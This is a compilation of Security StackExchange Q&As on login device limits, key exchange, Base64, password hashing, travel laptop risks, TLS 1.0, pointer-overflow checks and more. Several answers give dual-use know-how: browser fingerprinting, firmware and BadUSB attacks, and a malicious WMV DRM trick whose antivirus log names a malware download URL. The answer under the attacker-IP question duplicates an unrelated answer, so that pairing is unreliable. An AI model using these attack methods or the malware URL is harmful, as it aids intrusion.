Below is a proposal for dealing with a situation of website security. I am wondering whether it seems feasible, from both a technical and usability point of view. I want to make sure that the proposal does contain any glaring errors. The website The website in question is a school website where students may purchase various items. These students get an account on the website with a username and password, which they can use to login. Once they login, they have access to protected pages with private content which are unavailable to the public at large. The security concern The owners of the website wish to prevent a situation where a single student signs up on the website, obtains a username and password, and then circulates those credentials to a circle of friends who are then able to login to the website and illegally view the private content. The solution The central idea we have come up with to deal with this security problem is to permit each student to login to the website on two devices only. Once a student logs in on two different devices, they are restricted to those two devices. If they then attempt to login on a third device, the system would simply not permit them to do so. It is our understanding that other websites offering private content, such as Netflix, use such an approach. Implementation Two ideas come to mind to implement the above security measure: IP address and cookies. We rule out IP addresses which can change, and choose cookies. Websites such as amazon.com allow their customers to login once, and then whenever they return to the website, they are always recognized. This is almost certainly achieved through cookies. Thus each time a student logs in, we will store on their device a cookie. And we will also store this cookie in our database under that student's account. Thus each time a student logs in on any device, we will check whether the device they are currently logging in on contains the cookie we have stored for that student. If it does not, we will know that the student is logging in on a different device. We will thus be able to know how many devices the student is trying to login on. Drawbacks We have identified at least three possible drawbacks to this approach: Clearing cookies. People can, for a variety of reasons, choose to clear the cookies from their computer. A bona fide person may occasionally not have access to their usual device, and wish to login on a different computer. People do purchase new devices from time to time. These are examples of situations where a bona fide user, for legitimate reasons, wishes to login, but will be unable to, due to the website's security restriction of two devices. We have some ideas as to how to build logic into the system to deal with such situations, which we may implement in the future, but for the time being, we feel that such situations are sufficiently rare that we do not need to handle them programmatically. Rather, for now, in the event that a student is locked out, they will get a screen with a message explaining why we have not allowed them into the system, and a button which they can click on which will automatically generate an email to the site administrators. The email will inform them that a student wishes to login on a third device. The administrators can then contact the student, and if they are satisfied that the need is bona fide they will be able to take steps from the CMS to allow that student in. The size of the student body is sufficiently manageable that the above approach should be feasible. Fair warning We will inform the students of these security measures when their account is activated in order to prevent unpleasant surprises.
What you are trying to do is futile. Information can not be contained. You can not prevent someone from passing on information. When they can not share their logins, they just copy&paste the text. When you disable copy&pasting (the common methods to do this can be easily bypassed, by the way), they will make screenshots. When you find some way to make screenshots impossible (I couldn't think of any), they will read it to each other. All you will achieve is impair the user experience for legitimate users without really preventing abuse. But when you really want to go down that route, you might look at alternative ways of browser fingerprinting than IP address and cookies. There is a lot of other information a web browser transmits on every page request, and often it is sufficiently unique to identify a user. The Electronic Frontier Foundation has an interesting demo with their Panopticlick website. Among the techniques used are: UserAgent string (browser self-identification) HTTP_ACCEPT Headers Installed plugins and their version numbers Installed fonts Timezone Screen size and color depth Alternative cookie techniques (localstorage, persistent storage in plugins like Flash) Keep in mind that all these identification methods are prone to false negatives because many of them can change at any time. You should only consider a fingerprint as comming from a new device when multiple properties drastically change simultaneously. When the difference to the previous device profile is minor, you should silently update the device fingerprint instead.
{ "source": [ "https://security.stackexchange.com/questions/105625", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92036/" ] }
105,731
Let's say "Alice" and "Bob" want to communicate with each other over an insecure network. Using Diffie–Hellman key exchange, they can get the same symmetric key at last. However, as I understand, they do not have to get the same symmetric key at all, because they can just use asymmetric key without key exchange. With RSA algorithm, Alice and Bob can just share their public keys ( public_a , public_b ) and keep their private keys ( private_a , private_b ). Alice can just send Bob the messages which are encrypted by public_b , and Bob can decrypted it by private_b . They can still communicate over an insecure network, without Diffie–Hellman key exchange at all . I know I might be wrong, but I'm not sure where I was wrong. Does anyone have ideas about why and when Diffie–Hellman key exchange (or any key exchange) is necessary? Is it suitable for the situation I mentioned above?
If the attacker is able to passively capture data and later gets access to the private key of the certificates (i.e. stealing, heartbleed attack or law enforcement), then the attacker could decode all previously captured data if the encryption key is only derived from the certificate itself. DH key exchange makes it possible to create a key independent from the certificate. This way knowledge of the certificate alone is not enough to decode previously captured data. This is called forward secrecy. See Wikipedia for more information. Apart from getting forward secrecy with DH there are other reasons to use symmetric cryptography instead of simply using the RSA private keys. Thus even if you don't use DH for key exchange TLS will create a symmetric key, which is then derived from the certificate. For more details why using the private key directly to encrypt is not a good idea see Why does PGP use symmetric encryption and RSA? .
{ "source": [ "https://security.stackexchange.com/questions/105731", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92148/" ] }
105,736
As a programming exercise I need to decrypt a message. The only clues that I have is that it seems are: The encoded message contains only Base64 Characters a n letter sequence (n in 1,4,7,10) times it returns an encrypted message with "==". a n letter sequence (n in 2,5,8,11) times it returns an encrypted message with "=". a n letter sequence (n in 3,6,9,12) returns an encrypted message without a specific character. I do not want a solution, I am just wondering if this sequence of occurrences for the equal sign provide a clue or not.
The = signs relate to the length of the string being encoded in Base64 . Essentially, in probably the most common form of Base64, = is used as a padding character to ensure that the last block can be decoded properly. Base64 is not encryption - there is no hiding going on in it - but is often used to allow for binary data to be sent in text only form. All the characters used in Base64 will paste correctly, and can be entered using a keyboard with no modifier keys beyond shift.
{ "source": [ "https://security.stackexchange.com/questions/105736", "https://security.stackexchange.com", "https://security.stackexchange.com/users/30741/" ] }
105,823
That is to say, in what cases does it make sense to commit an unencrypted keypair to internal source control like SVN or Git? Related question that discusses an encrypted private key: Is it bad practice to add an encrypted private key to source control?
When the private key is nothing more than a test fixture used to test some process requiring a private key and where the private key is not actually used to secure any system. In some cases it can be appropriate to commit an encrypted key. For example if the repository is public/open source but a Continuous Integration system requires access to that file - Travis CI supports this . Otherwise you shouldn't commit private keys.
{ "source": [ "https://security.stackexchange.com/questions/105823", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78278/" ] }
105,836
It's quite well known that if an attacker wanted to, they could spoof their IP address by using a proxy server or some other means. Whilst that's possible, whenever I perform a geo-location lookup on the IP addresses that conduct automated brute force attacks, probing, port scanning etc. against my servers, almost always the IP addresses do resolve to countries associated with cyber crime, like: China USA Russia Turkey Italy etc. Knowing that the Internet is very independent of geography, for example it's possible to sign up with server hosts anywhere in the world and in fact it would be desirable - from an attackers point of view - that their IP was not associated with a country with a bad reputation. Also, because servers are sometimes added to a botnet when compromised, I always assumed remote servers were the preferred "weapon of choice" for attackers. However, I'm now wondering - are the people conducting this activity forced to use local ISP's in countries with more lax laws and that don't crack down on malicious activity (I'm assuming they can't get access to all the big name reputable providers - because their accounts would be shut down quite quicky)? And does this also then mean that they generally have to supply their own machines? I know there are lots of ways to setup a computer and connect to the Internet - but what is the typical setup for these automated bots regarding whether they are remote rented servers or local physical machines and how do they get Internet access?
When the private key is nothing more than a test fixture used to test some process requiring a private key and where the private key is not actually used to secure any system. In some cases it can be appropriate to commit an encrypted key. For example if the repository is public/open source but a Continuous Integration system requires access to that file - Travis CI supports this . Otherwise you shouldn't commit private keys.
{ "source": [ "https://security.stackexchange.com/questions/105836", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73523/" ] }
106,022
A couple of days ago I was having a conversation using Skype, then I wanted to share a link to a page with the interlocutor. I didn't want to let her understand the link content by just looking at the URL so I shortened it with Google shortening service, then I wrote her the link. The service let me know how many times (telling also the referrer and the browser) the link has been clicked. I noticed immediately that someone located in U.S clicked the link (identifying as Chrome and www.google.co.in as referrer). (Firefox clicks are mine) I asked to the interlocutor if she pressed the link (even though we're in Italy she may have some strange network configuration), but she ensured me that she didn't. Should I suppose that someone is spying my Skype conversations? Update 1 - Unshared links details I just noticed that 9 days ago I created a link with the shortener, but then I did not share it with anyone, only me clicked it and this is the result of the Google charts: So can I exclude that the link I shared on Skype was visited by Google (if it was, why this link is not visited by no one?), or at least that if Google visits it they don't show their visit in the Details page? (I have more than one link generated and not shared and no one of them result visited by Google or other except me) Update 2 - All the shared links are visited by someone who shouldn't! I also noticed that all the links I shared with Skype in the last 2 weeks have been visited at least once by a Chrome browser (with Google referrer), the most particular is this: Total visits are 5, one is mine (the only Firefox), another one (with Chrome) is the click done by the Skype interlocutor (I'm pretty sure that she visited it just one time because the count of visits from Italy is 2 (my click and her's)). Who made the remaining visits? If it was Microsoft, why the referrers are www.google.com.br and www.google.com and the browser identifies as Chrome? Update 3 - About Skype URI preview @Ankit Sharma said that it is possible that Skype URI preview functionality is looking at the link I shared, so I wrote a simple C# program to check this, here is the code: var request = (HttpWebRequest)WebRequest.Create(theURL); request.UserAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5"; // This is the UserAgent he wrote in his answer var response = (HttpWebResponse)request.GetResponse(); using (var sr = new StreamReader(response.GetResponseStream())) sr.ReadToEnd(); I run this code and then I checked the Details but it didn't record anything. To check if my program was buggy I tried changing the UserAgent to Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16 (taken here ) and rerun it, then I checked at the Stats and it is now showing an Opera click. So I think that it is not due to Skype "functionality" that the suspicious clicks appear.
Given the information you have provided I'd say that it's google shortener visiting the url to check it for security purposes: " Our spam detection algorithms are automated, and routinely disable suspicious goo.gl short URLs " see here . Back in 2013 it came out that Microsoft monitors skype conversations for HTTPS urls. It then visits these urls purportedly for " preventing spam, fraud or phishing links " ( more info here , or on google), so regardless you need to be aware that skype is not suitable for secure text conversations. UPDATE So I've just seen your updated information in your question. I'd still say that at some point known to themselves, something at google will probably hit the URL, either for indexing or security. However thinking about it I wouldn't have expected any of the google's own crawlers/bots to appear in their own statistics; as they're not clicks and they wouldn't want to affect the statistics they present you with, and the bot(s) would visit the destination of the shortened URL, not the shortened URL itself. If the original shortened URL led to a system under my control I'd now be looking for web server log files to see what requests have been made. There's always the possibility that there's something else on your machine, or on the machine of the person you sent the URL to, which is responsible for the activity. That could either be something benign or not. Another thought is that since 2013 Microsoft have changed how their spam preventing system works, but I can't see it having a chrome user agent string!
{ "source": [ "https://security.stackexchange.com/questions/106022", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92434/" ] }
106,026
Currently my project still uses MD5 hashing to encrypt passwords. Yeah, I know. I'm planning to update the password system to use the newer password_hash and password_verify functions in PHP, which will improve the security of the users' passwords. However, my moderator team has voiced a concern: since one of our core rules prohibits users from having more than one account, they need ways to tell if two accounts belong to the same person. One such way that they have used is to check if the MD5 hashes are the same on the two suspect accounts - if so, then the accounts have the same password and suspicion intensifies. But with the proposed new system, this will no longer be possible because different hashes will be produced on the two accounts. In the interest of finding a compromise, is there any way to use the better security of password_hash , while still providing a way for the moderator team to detect when two accounts share the same password? My thoughts at the moment involve hashing the password in some other way that will produce the same hash for the same password, but I'm worried that this will re-introduce the same vulnerability that we're trying to escape by moving away from MD5. Are there any options here or will I have to use Executive Decision Power to overrule the concern?
One of the reasons that password_hash produces different results for the same password is to prevent information leaks and make passwords harder to crack if the hashes are obtained by an attacker. You really don't want to compromise this security feature - not only will it be less protection for customer data but you will also be rolling your own solution rather than using well supported and accepted solutions. Using identical password to detect multiple accounts by the same account holder is a bad idea anyway - it is bound to cause false positives and result in you blocking legitimate accounts.
{ "source": [ "https://security.stackexchange.com/questions/106026", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
106,039
I recently took a business trip to China. Our IT department told me I could not take my normal machine, and instead gave me a loaner. This loaner had MS Outlook and was linked to my normal company e-mail account. I logged into the corporate network using the same VPN and token (Mobile Pass on my iPhone) that I would have used had I taken my normal machine. I should note that I did take my normal iPhone, not a loaner. The primary difference from the normal machine seems to be that upon my return, the loaner would be reimaged, and presumably used as a loaner on the next trip someone took. I was never asked not to place the loaner on the company network on my return, and I never tried so I do not know if it would connect to the network or not. There were also no restrictions on moving files from the loaner onto my normal machine. I also used my normal logins on the loaner (user id, passwords, etc.). My question is: does this loaner laptop policy provide significant security benefit over taking the user's normal machine? Follow up edit: and does the fact the destination is China, versus, say a location in Europe or the US make a difference?
I recently took a business trip to China. Our IT department told me I could not take my normal machine, and instead gave me a loaner. That may not have helped you at all. The reason I'm saying this is because you connected that laptop to the corporate network after you brought it back to your country. This loaner had MS Outlook and was linked to my normal company e-mail account. I logged into the corporate network using the same VPN and token (Mobile Pass on my iPhone) that I would have used had I taken my normal machine. I should note that I did take my normal iPhone, not a loaner. You shouldn't ever reconnect that computer to your corporate network. You need a clear separation of concerns. International Corporate Espionage and You Do you have a company that does important business in China? You may have been hacked on arrival . Unfortunately, since you also connected to the corporate email and other accounts, you may have had all of your email addresses and contacts exfil'd . Why would they need that information? For phishing attacks, for information on clients, contacts, et al. Unfortunately, most of the hotel internet service that I've encountered have had significant problems with their login portals, such as drive-by-download exploits in Javascript, Flash, and Java. If you had any of those enabled, and your machine was vulnerable, then it's quite possible you're infected without realizing it. I've personally come across hotel WiFi that "doesn't work," which requires "IT staff" in the hotels who will personally come in and set up your connection properties ( IPv4 , IPv6 , DNS , et al) to connect through a malicious server. Sometimes they even try to download files on my laptop while "fixing" it. Firmware attacks are possible The primary difference from the normal machine seems to be that upon my return, the loaner would be reimaged, and presumably used as a loaner on the next trip someone took. Unfortunately, this won't help against firmware-based attacks. It can be as simple as inserting a BadUSB device when you're away. Walk in, insert, wait for confirmation of flashed hardware, leave. If you're working for a government contractor, or have important company secrets to protect, I wouldn't even trust a re-imaged drive. Full disk encryption doesn't protect you against flashed firmware, or even hidden device implants. They can simply turn on the laptop, insert a piece of media that contains malware, flash your bios without even touching the drive, and then install bios-based malware . But firmware attacks aren't absolutely necessary Did you leave the laptop alone in the hotel while you went shopping, or when to an important meeting? It may have been broken into physically while you weren't there. One good way to defend against this is by ensuring that your hard drive was encrypted, and then shutting it off when you're gone. But this isn't perfect either; they can physically implant things in your laptop faster than you think. You could also try placing few warranty/void seals on the laptop edges before visiting China. If they're broken, assume the hardware is compromised. Again, keep in mind that full-disk encryption won't save you from hardware-based attacks. If they copied your hard drive contents and then installed a hardware-based keylogger, then they could retrieve your hard-drive contents easily. What about my phone? Is it safe? Since you mentioned your phone in your post, I thought I'd add this little tidbit. It's possible to replace your phone's charging equipment with a malicious doppelganger while you're gone, or even while you're asleep. If you spend enough time in hotels, you may run even into hotel employees who actually enter your hotel while you're asleep. Even if you've bolted the doors and locked them. Should I connect to my normal corporate network while in China? I was never asked not to place the loaner on the company network on my return, and I never tried so I do not know if it would connect to the network or not. There were also no restrictions on moving files from the loaner onto my normal machine. I also used my normal logins on the loaner (user id, passwords, etc.). I would suggest that your IT Security staff spends a bit more time learning about foreign attackers. Using your normal logins is pretty much a huge no-no in China, or in any other high-risk area. Are there any security benefits of your laptop policy? My question is: does this loaner laptop policy provide significant security benefit over taking the user's normal machine? Nope. The reason is that you ended up connecting to your corporate network's VPN. I took a lot of disposable tech to China, and it ended up getting hacked every single time. I reformatted afterwards, and the infection persisted. Had I connected that to an important network where I had read/write access to critical things, I'd be in for a world of trouble. If you want an Advanced Persistent Threat spreading everywhere, go for it. Personally, I want all the infections so I can reverse-engineer them! :-) However, considering your company likely has secrets to protect, I would not trust this laptop policy. In fact, what you're describing - the way you used the computer - sounds like a goldmine to a skilled hacker, or even a script kiddie who can automate the attack. What would you do at this point if you considered your data breached? It could just be the early stages of a breach, getting the data ready for a phishing attack, or you might've had more important information available potential attackers. But what about the corporate VPN? Keep in mind, as I've stated several times, if you connected to your company through the corporate VPN, and someone in China or elsewhere infected your machine, then anything you're allowed to do on that corporate network is also accessible to them . Are you allowed to create/read/write critical files and folders? So could they. Again, whatever you're allowed to do on your corporate network, so can they if they control your computer. This could be done silently without you realizing it, even while you're on the system.
{ "source": [ "https://security.stackexchange.com/questions/106039", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91684/" ] }
106,049
A guide on this site on how to make a decent Certificate Signing Request (CSR) says that I should be using SHA-2 certificates to secure a HTTPS webserver. Are SHA-2 certificates considered obsolete, or current for TLS/SSL website certificates (as of 20 th November 2015)? If they are, what should I be using to secure TLS/SSL/HTTPS on my Apache2 webserver instead (as of 20 th November 2015)? And where can I find a authoritative source of current information concerning obsoletions of this sort?
"SHA-2" is the traditional codename for a family of six functions that includes SHA-256 and SHA-512. These functions are considered completely fine and current and non-obsolete. There is a newer family of functions called SHA-3, but it has been formally defined only very recently, and nobody really supports them yet. Moreover, SHA-3 is not formally defined as a replacement for SHA-2, but as an alternative . All the current fuss is about an older function called "SHA-1", not "SHA-2" (and most of the panic is greatly exaggerated).
{ "source": [ "https://security.stackexchange.com/questions/106049", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6103/" ] }
106,072
I have a smart phone that I often plug into a wall socket for charging via a small adapter that rectifies the AC to DC power and transforms the voltage from line (120V or 240V) to 5 V DC, probably using a switching power supply. Standard stuff. I am concerned that if there is broadband on the power lines, for example powerline Ethernet, that unwanted digital signals might be transmitted to my phone. I realize many say that the electrical transformer and rectifier would damp out any digital signals (for example, as explained in this post ), but I believe unless these high frequency signals are specifically filtered , they will come through. I have had experience with noise in supply lines coming into test equipment unless we had very nice power supplies (see for example, as explained here ). I am unsure my $5 wall charger is that nice. Does anyone have any data from testing or more detailed specifications on the wall chargers? Is this really a problem?
There is nothing stopping an attacker from putting a powerline ethernet transceiver as well as a USB-enabled microcontroller into a USB charger. This would allow them to communicate with the charger in the hope to offload some malware onto a smartphone plugged into that port. However, such a device would need to be highly specialized and specifically designed for this purpose. There is simply no way that powerline ethernet could just magically transmit data over the USB data lines to a smartphone. If you are at all afraid that something like this might be happening, there are products that exist specifically to prevent such a scenario. For example, the SyncStop : SyncStop prevents accidental data exchange when your device is plugged into someone else’s computer or a public charging station. SyncStop achieves this by blocking the data pins on any USB cable and allowing only power to flow through. This minimizes opportunities to steal your data or install malware on your mobile device. You could also cut the cable open and physically disconnect the D+ and D- pins (which is effectively what the SyncStop does), and that will definitely stop all communication. How it works Powerline ethernet works by transmitting data on a high frequency over a building's mains power wiring. This is possible due to the fact that AC mains power uses either 50Hz, 60Hz or some other relatively low frequency. These devices transpose their data directly on top of the 120V/240V already present on the mains. You can read more about how this is actually don on a hardware level here . Any wall charger that you find that is smaller than a baseball and weighs next to nothing is what is known as a switching AC to DC converter. These devices work by rectifying the mains power to DC, smoothing the rectified DC with a large capacitance, and then using a small transformer to switch the rectified DC at a very high speed (in the neighborhood of 100s of kHz to MHz). You can read more about them here . Why it's not possible To rectify the AC mains to DC, the charger uses either a full wave, or half wave rectifier. These are just diodes, any signal present on the AC mains will also be present on the rectified DC, and the same can be said of the smoothing circuitry. Even if the signal present on the rectified DC was able to somehow make its way across the transformer, the switching circuit in the charger will cause quite large portions of that signal to be lost when the transformer is switched off. After the transformer, there is yet more smoothing circuitry that ensures the final output is as close to 5V as possible meaning that even if some signal made it through the aforementioned gauntlet, it would be smoothed out into silky smooth 5V. The above doesn't even consider how USB works. There are two data pins, D+, and D-. They form what is known as a differential pair, and they mirror each other. This means that any signal present on the 5V line will also need to be mirrored to ground in order for the USB transceiver on the phone to even bat an eye. Moreover, the USB specification includes packets, handshaking, and everything you would expect from a high-speed protocol like USB. I know what you are thinking "Doesn't Ethernet also have packets and handshaking?" and yes, it does, but that's like saying a zebra is the same as a platypus. So no, without modifying an off-the-shelf charger with some quite complicated hardware and software, it is impossible for this to happen.
{ "source": [ "https://security.stackexchange.com/questions/106072", "https://security.stackexchange.com", "https://security.stackexchange.com/users/91684/" ] }
106,186
I am currently studying IT at college (UK college aka not University) and the coursework is boring me to death. I have been coding for quite a while now mainly in OO languages such as C# and Java but often get bored and give up quickly because the majority of it is boring UI stuff I hate doing, the projects I come up with rarely have much to do with code design and actually creating algorithms. I want to start writing my own algorithms of sorts and start moving away from the user friendliness side and start learning things that interest me, namely cryptography and compression. I want to write my own encryption algorithm, to encrypt the bytes of a file or string. I have a few questions: Where would I start with this, What books/materials are recommended for starting with cryptography? Do I need extensive cryptography knowledge to get started on a basic algorithm? Will C# be OK for putting an encryption algorithm into practice? Any help would be sincerely appreciated. I want to start writing code so when it comes to applying to uni, I have something to show for all of my bold claims on my application!
Of course you can start small and implement your own algorithms. But do not assume they provide any security beyond obfuscation . The difficult thing when it comes to cryptography is finding reasons why something actually is secure. You won't be able to decide that within months and if you feel like you are at that point, you are most probably wrong. It is much easier to find reasons why things are insecure than reasons why they are secure, so if you want to start somewhere, develop your own algorithms until you think they are secure and then try to find out why they are not and find ways to attack them. Most mistakes are made when implementing algorithms. So if you want to get a well paid job you could learn how to implement that stuff correctly. I would recommend starting to implement something like AES and than continue to different operation modes like CBC or CCM and find out why randomness is important. Continue with SHA-2 and HMAC and proceed to asymmetric cryptography. Always check what others did and why they did it and have a special look at side channel attacks and how they are performed. If you are at that point you will find your way to go on. The reference to start with would be the "HAC", which is freely available online: http://cacr.uwaterloo.ca/hac/ [Edit] A suggestion from JRsz which shall not be buried in the comments. A good book for beginners: http://crypto-textbook.com/
{ "source": [ "https://security.stackexchange.com/questions/106186", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92607/" ] }
106,188
I've downloaded a .wmv file using P2P. Attempting to play it with Media Player Classic (K-Lite Codec Pack) only gave me a green square in the playback window: I noticed that the video came with a readme file, however; I found the following inside: This video has been encoded using the latest DivX+ software, if you are having trouble playing this video please try windows media player Media Player should automatically update any out dated codecs Since the K-Lite Codec Pack is my media software of choice, I decided to visit their site to see if there was an upgrade available. Indeed, the latest version at the moment of writing was released on November 19th 2015 (the version I was using had been installed on my PC at the beginning of November because I'd bought a new hard drive and reinstalled the OS). I've downloaded and installed the update, but nothing changed, I still got the same green square. Now, this part I am ashamed of; instead of getting suspicious, I did what the file suggested, i.e. ran it in WMP, which indeed suggested that I download some codecs. I let it do it, typed the admin password because my account is a regular one, and then a few interesting things happened. UAC has been disabled without me doing anything; Windows showed a prompt telling me that I need to reboot to disable it, and when I checked the settings, it has indeed been turned off Opera Browser has been installed and a shortcut was put on my desktop NOD32, the AV I'm using, went crazy: two HTTP requests have been blocked and two executables quarantined, logs follow: Network: 15/11/22 3:35:29 PM http://dl.tiressea.com/download/dwn/kmo422/us/setup_ospd_us.exe Blocked by internal IP blacklist C:\Users\admin\AppData\Local\Temp\beeibedcid.exe desktop\admin 37.59.30.197 15/11/22 3:35:29 PM http://dl.tiressea.com/download/dwn/kmo422/us/setup_ospd_us.exe Blocked by internal IP blacklist C:\Users\admin\AppData\Local\Temp\beeibedcid.exe desktop\admin 37.59.30.197 Local files: 15/11/22 3:35:38 PM Real-time file system protection file C:\Users\admin\AppData\Local\Temp\81448202922\1QVdFL1BTSQ==0.exe a variant of Win32/Adware.ConvertAd.ACN application cleaned by deleting - quarantined desktop\admin Event occurred on a new file created by the application: C:\Users\admin\AppData\Local\Temp\beeibedcid.exe. 15/11/22 3:35:35 PM Real-time file system protection file C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\51L9SWGF\VOPackage 1 .exe a variant of Win32/Adware.ConvertAd.ACN application cleaned by deleting (after the next restart) - quarantined desktop\admin Event occurred on a new file created by the application: C:\Users\admin\AppData\Local\Temp\beeibedcid.exe. beeibedcid.exe had been running as a process before I killed it manually using the task manager. Even though ESET didn't touch it, it's no longer in AppData\Local\Temp . Upon closer inspection, I realized that the prompt WMP opens to allow me to "update my codecs" doesn't look like a WMP component: The UI differs in certain subtle ways, and the sentence composition/syntax is poor. Undeniably though the most suspicious thing is the domain in the upper left corner, playrr.co ; a simple whois lookup reveals that the domain has been registered on November 17th this year - five days ago - and the registrant is WhoisGuard, so the actual registrant clearly wanted to conceal their details. Note that clicking both "Download Fix" and "Web Help" has the same effect; the following IE download prompt pops up: I should add that the video I downloaded had been uploaded on 2015-11-22 13:29:23 GMT, roughly an hour before I downloaded it. The OS is Windows 8.1 Pro x64 and the AV is ESET Nod32 AV 7.0.302.0, with the latest signatures. I'm annoyed at myself because this is a fairly obvious trap, but at the same time I'd never think to check Windows Media Player dialogs for obvious trojan/adware! How does this thing work? It couldn't have possibly affected my Windows Media Player executable before it was played because it's a media file. Is this a recent vulnerability discovered in the software? Because I doubt Microsoft would allow media files to specify a site to download codecs from... No matter what it is, it seems to be a relatively new thing. What can I do to ensure others don't fall for this? I don't think any AV vendor would allow me to submit a .wmv file a few hundred megabytes in size for analysis. Thanks for your time.
This video file uses (well, abuses) Windows Media Player's DRM functionalities which allows content providers to embed an URL in their protected content that will be displayed in a Windows Media Player window to allow the user acquire a license to play the content. Its legitimate usage goes like this : user registers on an online music store and downloads some DRM-protected files, which have their actual media content encrypted user opens them in Windows Media Player, it opens a window with the URL specified in the media file, in this case a legitimate URL from the music store which asks for the user's login user enters his credentials, the music store authenticates them and gives WMP the decryption key which is then cached and the file can now be played In this case, the feature has been abused to display a fake WMP error about missing codecs (it's in reality a webpage, as the domain name in the top bar suggests, and if it was real the window would've been much smaller) to make you click a (fake) button that points to malware masquerading as codecs. There's some more info about this DRM system on Wikipedia , and it seems to be deprecated in favour of PlayReady. Whether this new iteration will allow such abuse isn't yet known.
{ "source": [ "https://security.stackexchange.com/questions/106188", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90916/" ] }
106,310
The PCI Data Security Standard 3.1 recommends disabling "early TLS" along with SSL: SSL and early TLS are not considered strong cryptography and cannot be used as a security control after June 30, 2016. The Migrating from SSL and Early TLS supplement states: The best response is to disable SSL entirely and migrate to a more modern encryption protocol, which at the time of publication is a minimum of TLS v1.1, although entities are strongly encouraged to consider TLS v1.2. I have a few questions regarding the deprecation of TLS 1.0: What is the reason for this recommendation? Are there known vulnerabilities with the TLS 1.0 protocol? (I'm aware that some faulty TLS implementations are vulnerable to POODLE but a SSL Labs scan indicated that my site was not vulnerable.) Is it necessary/desirable to apply this standard to web applications using HTTPS that are not handling credit card information? Is disabling TLS 1.0 and restricting to TLS 1.1 or 1.2 on public-facing websites using HTTPS likely to break browser compatibility for a significant proportion of users?
TLS 1.0 when properly configured has no known security vulnerabilities. Newer protocols are better designed and better address the potential for new vulnerabilities. So that's why I wouldn't personally recommend disabling TLS 1.0, primarily because IE 7-10 don't support TLS 1.1 out of the box. In January 2020, IE10 has gone EOL, so I expect it's likely now a good idea to disable TLS 1.0 since there's likely little/no traffic from such an old browser. If you look carefully at the support matrix at: https://en.wikipedia.org/wiki/Transport_Layer_Security#Web_browsers you'll see that TLS 1.1 is disabled by default on everything but IE 11. Most people have a significant amount of traffic on these browsers, and your website suddenly not working would pose a significant business impact. Many people here will advocate a single minded approach of "Security above all else", and tell you to strongly advocate for disabling TLS 1.0. I'm of the belief that security needs to be balanced with business needs, and it's the job of the security professional to understand both the security side, and the impact of changes. As of 2020, the general principle here still applies, but the tradeoffs have moved towards disabling TLS1.0 in most circumstances. There may still be some special circumstances of old, embedded devices where you might be able to justify keeping TLS1.0 enabled. In 2020, there's little reason to keep TLS1.0 around, at least for browsers as the client. You obviously need to test the impact of this on the stock browser config, and understand how much business you may or may not lose from this change.
{ "source": [ "https://security.stackexchange.com/questions/106310", "https://security.stackexchange.com", "https://security.stackexchange.com/users/36600/" ] }
106,382
A person has good knowledge of overall security risks, knows what OWASP Top 10 vulnerabilities are, and has certifications like CEH, CISSP, OSCP, etc. which are more black-box testing. And also he has gone through the OWASP Testing Guide, Code Review Guide, etc. and cheat sheets. Will he be able to perform secure code review without knowledge of multiple programming languages and mastery over them?
It depends on what is meant by "secure source code analysis." One can do anything one pleases. The issue, I presume, is when someone else has asked for something called "secure source code analysis," and one wonders why one is not qualified for it. In many cases, such analysis must be done by a Subject Matter Expert (SME). In the final product, a SME will deliver a statement basically saying "I declare this code to be secure," with an understanding that is a more profound statement than "I looked for a bunch of known patterns, and found no problems." If you were interested in the authentic translation of a Chinese philosophy, would you trust an individual who knew a great deal about philosophy, and had a bunch of cheat sheets to help decipher it, but did not actually know Chinese? One great example that comes to mind is a bug that hit a SQL engine. Forgive me for not having the name of which engine, or which version so you can verify, I have had trouble finding it since. However, the error was poignant. The error was in code that looked like this: int storeDataInCircularBuffer(Buffer* dest, const char* src, size_t length) { if (dest->putPtr + length < dest->putPtr) return ERROR; // prevent buffer overflow caused by overflow if (dest->putPtr + length > dest->endPtr) { ... // write the data in two parts return OK; } else { ... // write the data in one part return OK; } } This code was intended to be part of a circular buffer. In a circular buffer when you reach the end of the buffer, you wrap around. Sometimes this forces you to break the incoming message into two parts, which is okay. However, in this SQL program, they were concerned with the case where length could be large enough to cause dest->putPtr + length to overflow, creating an opportunity for a buffer overflow because the next check wouldn't work right. So they put in a test: if (dest->putPtr + length < dest->putPtr) . Their logic was that the only way this statement could ever be true is if an overflow occurred, thus we catch the overflow. This created a security hole that actually got exploited, and had to be patched. Why? Well, unbeknownst to the original author, the C++ spec declares that overflow of a pointer is undefined behavior, meaning the compiler can do anything it wants. As it so happened, when the original author tested it, gcc actually emitted the correct code. However, a few versions later, gcc did have optimizations to leverage this. It saw that there was no defined behavior where that if statement could pass its test, and optimized it out! Thus, for a few versions, people had SQL servers which had an exploit, even though the code had explicit checks to prevent said exploit! Fundamentally programming languages are very powerful tools that can bite the developer with ease. Analyzing whether this will occur does require a solid foundation in the language in question. (Edit: Greg Bacon was great enough to dig up a CERT warning on this: Vulnerability Note VU#162289 C compilers may silently discard some wraparound checks. , and also this related one. Thanks Greg!)
{ "source": [ "https://security.stackexchange.com/questions/106382", "https://security.stackexchange.com", "https://security.stackexchange.com/users/44591/" ] }
106,525
I am using the following command in order to generate a CSR together with a private key by using OpenSSL : openssl req -new -subj "/CN=sample.myhost.com" -out newcsr.csr -nodes -sha512 -newkey rsa:2048 It generates two files: newcsr.csr privkey.pem The generated private key has no password: how can I add one during the generation process? Note: take into account that my final goal is to generate a p12 file by combining the certificate provided according to the CSR and the private key (secured with a password).
